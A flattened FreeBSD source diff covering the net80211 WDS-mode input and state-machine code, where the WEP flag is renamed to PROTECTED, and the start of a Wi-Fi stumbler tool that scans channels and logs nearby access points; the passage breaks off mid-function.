Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. 
* * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 WDS mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif static void wds_vattach(struct ieee80211vap *); static int wds_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int wds_input(struct ieee80211_node *ni, struct mbuf *m, int, int); static void wds_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); void ieee80211_wds_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_WDS] = wds_vattach; } void ieee80211_wds_detach(struct ieee80211com *ic) { } static void wds_vdetach(struct ieee80211vap *vap) { if (vap->iv_bss != NULL) { /* XXX locking? */ if (vap->iv_bss->ni_wdsvap == vap) vap->iv_bss->ni_wdsvap = NULL; } } static void wds_vattach(struct ieee80211vap *vap) { vap->iv_newstate = wds_newstate; vap->iv_input = wds_input; vap->iv_recv_mgmt = wds_recv_mgmt; vap->iv_opdetach = wds_vdetach; } static void wds_flush(struct ieee80211_node *ni) { struct ieee80211com *ic = ni->ni_ic; struct mbuf *m, *next; int8_t rssi, nf; m = ieee80211_ageq_remove(&ic->ic_stageq, (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr)); if (m == NULL) return; IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_WDS, ni, "%s", "flush wds queue"); ic->ic_node_getsignal(ni, &rssi, &nf); for (; m != NULL; m = next) { next = m->m_nextpkt; m->m_nextpkt = NULL; ieee80211_input(ni, m, rssi, nf); } } static int ieee80211_create_wds(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node_table *nt = &ic->ic_sta; struct ieee80211_node *ni, *obss; IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: creating link to %s on channel %u\n", __func__, ether_sprintf(vap->iv_des_bssid), ieee80211_chan2ieee(ic, chan)); /* NB: vap create must specify the bssid for the link */ KASSERT(vap->iv_flags & IEEE80211_F_DESBSSID, ("no bssid")); /* NB: we should only be called on RUN transition */ KASSERT(vap->iv_state == IEEE80211_S_RUN, ("!RUN state")); if ((vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) { /* * Dynamic/non-legacy WDS. Reference the associated * station specified by the desired bssid setup at vap * create. Point ni_wdsvap at the WDS vap so 4-address * frames received through the associated AP vap will * be dispatched upward (e.g. to a bridge) as though * they arrived on the WDS vap. */ IEEE80211_NODE_LOCK(nt); obss = NULL; ni = ieee80211_find_node_locked(&ic->ic_sta, vap->iv_des_bssid); if (ni == NULL) { /* * Node went away before we could hookup. 
This * should be ok; no traffic will flow and a leave * event will be dispatched that should cause * the vap to be destroyed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: station %s went away\n", __func__, ether_sprintf(vap->iv_des_bssid)); /* XXX stat? */ } else if (ni->ni_wdsvap != NULL) { /* * Node already setup with a WDS vap; we cannot * allow multiple references so disallow. If * ni_wdsvap points at us that's ok; we should * do nothing anyway. */ /* XXX printf instead? */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_WDS, "%s: station %s in use with %s\n", __func__, ether_sprintf(vap->iv_des_bssid), ni->ni_wdsvap->iv_ifp->if_xname); /* XXX stat? */ } else { /* * Committed to new node, setup state. */ obss = vap->iv_bss; vap->iv_bss = ni; ni->ni_wdsvap = vap; } IEEE80211_NODE_UNLOCK(nt); if (obss != NULL) { /* NB: deferred to avoid recursive lock */ ieee80211_free_node(obss); } } else { /* * Legacy WDS vap setup. */ /* * The far end does not associate so we just create * create a new node and install it as the vap's * bss node. We must simulate an association and * authorize the port for traffic to flow. * XXX check if node already in sta table? */ ni = ieee80211_node_create_wds(vap, vap->iv_des_bssid, chan); if (ni != NULL) { obss = vap->iv_bss; vap->iv_bss = ieee80211_ref_node(ni); ni->ni_flags |= IEEE80211_NODE_AREF; if (obss != NULL) ieee80211_free_node(obss); /* give driver a chance to setup state like ni_txrate */ if (ic->ic_newassoc != NULL) ic->ic_newassoc(ni, 1); /* tell the authenticator about new station */ if (vap->iv_auth->ia_node_join != NULL) vap->iv_auth->ia_node_join(ni); if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); ieee80211_notify_node_join(ni, 1 /*newassoc*/); /* XXX inject l2uf frame */ } } /* * Flush any pending frames now that were setup. */ if (ni != NULL) wds_flush(ni); return (ni == NULL ? ENOENT : 0); } /* * Propagate multicast frames of an ap vap to all DWDS links. * The caller is assumed to have verified this frame is multicast. */ void ieee80211_dwds_mcast(struct ieee80211vap *vap0, struct mbuf *m) { struct ieee80211com *ic = vap0->iv_ic; const struct ether_header *eh = mtod(m, const struct ether_header *); struct ieee80211_node *ni; struct ieee80211vap *vap; struct ifnet *ifp; struct mbuf *mcopy; int err; KASSERT(ETHER_IS_MULTICAST(eh->ether_dhost), ("%s not mcast", ether_sprintf(eh->ether_dhost))); /* XXX locking */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { /* only DWDS vaps are interesting */ if (vap->iv_opmode != IEEE80211_M_WDS || (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY)) continue; /* if it came in this interface, don't send it back out */ ifp = vap->iv_ifp; if (ifp == m->m_pkthdr.rcvif) continue; /* * Duplicate the frame and send it. */ mcopy = m_copypacket(m, M_NOWAIT); if (mcopy == NULL) { ifp->if_oerrors++; /* XXX stat + msg */ continue; } ni = ieee80211_find_txnode(vap, eh->ether_dhost); if (ni == NULL) { /* NB: ieee80211_find_txnode does stat+msg */ ifp->if_oerrors++; m_freem(mcopy); continue; } /* calculate priority so drivers can find the tx queue */ if (ieee80211_classify(ni, mcopy)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_WDS, eh->ether_dhost, NULL, "%s", "classification failure"); vap->iv_stats.is_tx_classify++; ifp->if_oerrors++; m_freem(mcopy); ieee80211_free_node(ni); continue; } BPF_MTAP(ifp, m); /* 802.3 tx */ /* * Encapsulate the packet in prep for transmission. 
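* On failure the encap path is expected to dispose of the mbuf itself, which is why the NULL branch below only drops the node reference instead of calling m_freem().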
*/ mcopy = ieee80211_encap(vap, ni, mcopy); if (mcopy == NULL) { /* NB: stat+msg handled in ieee80211_encap */ ieee80211_free_node(ni); continue; } mcopy->m_flags |= M_MCAST; mcopy->m_pkthdr.rcvif = (void *) ni; err = ieee80211_parent_xmitpkt(ic, mcopy); if (err) { /* NB: IFQ_HANDOFF reclaims mbuf */ ifp->if_oerrors++; ieee80211_free_node(ni); } else ifp->if_opackets++; } } /* * Handle DWDS discovery on receipt of a 4-address frame in * ap mode. Queue the frame and post an event for someone * to plumb the necessary WDS vap for this station. Frames * received prior to the vap set running will then be reprocessed * as if they were just received. */ void ieee80211_dwds_discover(struct ieee80211_node *ni, struct mbuf *m) { struct ieee80211com *ic = ni->ni_ic; /* * Save the frame with an aging interval 4 times * the listen interval specified by the station. * Frames that sit around too long are reclaimed * using this information. * XXX handle overflow? * XXX per/vap beacon interval? */ m->m_pkthdr.rcvif = (void *)(uintptr_t) ieee80211_mac_hash(ic, ni->ni_macaddr); (void) ieee80211_ageq_append(&ic->ic_stageq, m, ((ni->ni_intval * ic->ic_lintval) << 2) / 1024); ieee80211_notify_wds_discover(ni); } /* * IEEE80211_M_WDS vap state machine handler. */ static int wds_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; int error; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_state = nstate; /* state transition */ callout_stop(&vap->iv_mgtsend); /* XXX callout_drain */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ error = 0; switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_RUN: if (ostate == IEEE80211_S_INIT) { /* * Already have a channel; bypass the scan * and startup immediately. */ error = ieee80211_create_wds(vap, ic->ic_curchan); } break; default: break; } return error; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int wds_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. 
Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) ni->ni_inact = ni->ni_inact_reload; if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* NB: WDS vap's do not scan */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_addr4)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (3): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* NB: the TA is implicitly verified by finding the wds peer node */ if (!IEEE80211_ADDR_EQ(wh->i_addr1, vap->iv_myaddr) && !IEEE80211_ADDR_EQ(wh->i_addr1, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr1, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* * Only legacy WDS traffic should take this path. */ if ((vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "not legacy wds"); vap->iv_stats.is_rx_wrongdir++;/*XXX*/ goto out; } /* * Handle A-MPDU re-ordering. 
If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. 
*/ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void wds_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; u_int8_t *frm, *efrm; wh = mtod(m0, struct ieee80211_frame *); frm = (u_int8_t *)&wh[1]; efrm = mtod(m0, u_int8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1)) { /* NB: not interested in multicast frames. 
*/ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } diff --git a/tools/tools/net80211/stumbler/stumbler.c b/tools/tools/net80211/stumbler/stumbler.c index b649c300e124..0e8d8be693a5 100644 --- a/tools/tools/net80211/stumbler/stumbler.c +++ b/tools/tools/net80211/stumbler/stumbler.c @@ -1,1039 +1,1039 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include //int hopfreq = 3*1000; // ms int hopfreq = 500; // ms int sig_reset = 1*1000; // ms int ioctl_s = -1; int bpf_s = -1; struct chan_info { int locked; int chan; struct ieee80211req ireq; struct timeval last_hop; } chaninfo; #define CRYPT_NONE 0 #define CRYPT_WEP 1 #define CRYPT_WPA1 2 #define CRYPT_WPA 3 #define CRYPT_WPA1_TKIP 4 #define CRYPT_WPA1_TKIP_PSK 5 #define CRYPT_WPA1_CCMP 6 #define CRYPT_WPA1_CCMP_PSK 7 #define CRYPT_80211i 8 #define CRYPT_80211i_TKIP 9 #define CRYPT_80211i_TKIP_PSK 10 struct node_info { unsigned char mac[6]; int signal; int noise; int max; unsigned char ssid[256]; int chan; int wep; int pos; int ap; struct timeval seen; struct node_info* prev; struct node_info* next; } *nodes = 0; void clean_crap() { struct node_info* next; if (ioctl_s != -1) close(ioctl_s); if (bpf_s != -1) close(bpf_s); while (nodes) { next = nodes->next; free(nodes); nodes = next; } } char* mac2str(unsigned char* mac) { static char ret[6*3]; sprintf(ret, "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); return ret; } char* wep2str(int w) { char* wep = 0; static char res[14]; switch (w) { case CRYPT_NONE: wep = ""; break; case CRYPT_WEP: wep = "WEP"; break; case CRYPT_WPA1: wep = "WPA1"; break; case CRYPT_WPA: wep = "WPA?"; break; case CRYPT_WPA1_TKIP: wep = "WPA1-TKIP"; break; case CRYPT_WPA1_TKIP_PSK: wep = "WPA1-TKIP-PSK"; break; case CRYPT_WPA1_CCMP: wep = "WPA1-CCMP"; break; case CRYPT_WPA1_CCMP_PSK: wep = "WPA1-CCMP-PSK"; break; case CRYPT_80211i: wep = "i"; break; case CRYPT_80211i_TKIP: wep = "11i-TKIP"; break; case CRYPT_80211i_TKIP_PSK: wep = "11i-TKIP-PSK"; break; default: wep = "FIXME!"; break; } memset(res, ' ', sizeof(res)); assert(strlen(wep) < sizeof(res)); memcpy(res, wep, strlen(wep)); res[sizeof(res)-1] = 0; return res; } char* ssid2str(struct node_info* node) { static char res[24]; memset(res, ' ', sizeof(res)); res[0] = '['; strcpy(&res[sizeof(res)-2], "]"); if (node->ap) { int left = sizeof(res) - 3; if (strlen(node->ssid) < left) left = strlen(node->ssid); memcpy(&res[1], node->ssid, left); } else { memcpy(&res[1], "", 8); } return res; } void save_state() { FILE* f; struct node_info* node = nodes; f = fopen("stumbler.log", "w"); if (!f) { perror("fopen()"); exit(1); } while (node) { struct tm* t; char tim[16]; t = localtime( (time_t*) &node->seen.tv_sec); if (!t) { perror("localtime()"); exit(1); } tim[0] = 0; strftime(tim, sizeof(tim), "%H:%M:%S", t); fprintf(f, "%s %s %s %2d %s 0x%.2x\n", tim, mac2str(node->mac), wep2str(node->wep), node->chan, ssid2str(node), node->max); node = node->next; } fclose(f); } void cleanup(int x) { endwin(); clean_crap(); exit(0); } void die(int p, char* msg) { endwin(); if (p) perror(msg); else printf("%s\n", msg); clean_crap(); exit(1); } void display_chan() { int x, y; char tmp[3]; x = COLS - 2; y = LINES - 1; snprintf(tmp, sizeof(tmp), "%.2d", chaninfo.chan); mvaddstr(y, x, tmp); refresh(); } void set_chan(int c) { chaninfo.ireq.i_val = c; if (ioctl(ioctl_s, SIOCS80211, &chaninfo.ireq) == -1) die(1, "ioctl(SIOCS80211) [chan]"); chaninfo.chan = c; if (gettimeofday(&chaninfo.last_hop, NULL) == -1) die(1, "gettimeofday()"); display_chan(); } void setup_if(char *dev) { struct ifreq ifr; unsigned int flags; // set chan memset(&chaninfo.ireq, 0, sizeof(chaninfo.ireq)); strcpy(chaninfo.ireq.i_name, 
dev); chaninfo.ireq.i_type = IEEE80211_IOC_CHANNEL; set_chan(1); // set iface up and promisc memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); if (ioctl(ioctl_s, SIOCGIFFLAGS, &ifr) == -1) die(1, "ioctl(SIOCGIFFLAGS)"); flags = (ifr.ifr_flags & 0xffff) | (ifr.ifr_flagshigh << 16); flags |= IFF_UP | IFF_PPROMISC; memset(&ifr, 0, sizeof(ifr)); strcpy(ifr.ifr_name, dev); ifr.ifr_flags = flags & 0xffff; ifr.ifr_flagshigh = flags >> 16; if (ioctl(ioctl_s, SIOCSIFFLAGS, &ifr) == -1) die(1, "ioctl(SIOCSIFFLAGS)"); } void open_bpf(char *dev, int dlt) { int i; char buf[64]; int fd = -1; struct ifreq ifr; for(i = 0;i < 16; i++) { sprintf(buf, "/dev/bpf%d", i); fd = open(buf, O_RDWR); if(fd < 0) { if(errno != EBUSY) die(1,"can't open /dev/bpf"); continue; } else break; } if(fd < 0) die(1, "can't open /dev/bpf"); strncpy(ifr.ifr_name, dev, sizeof(ifr.ifr_name)-1); ifr.ifr_name[sizeof(ifr.ifr_name)-1] = 0; if(ioctl(fd, 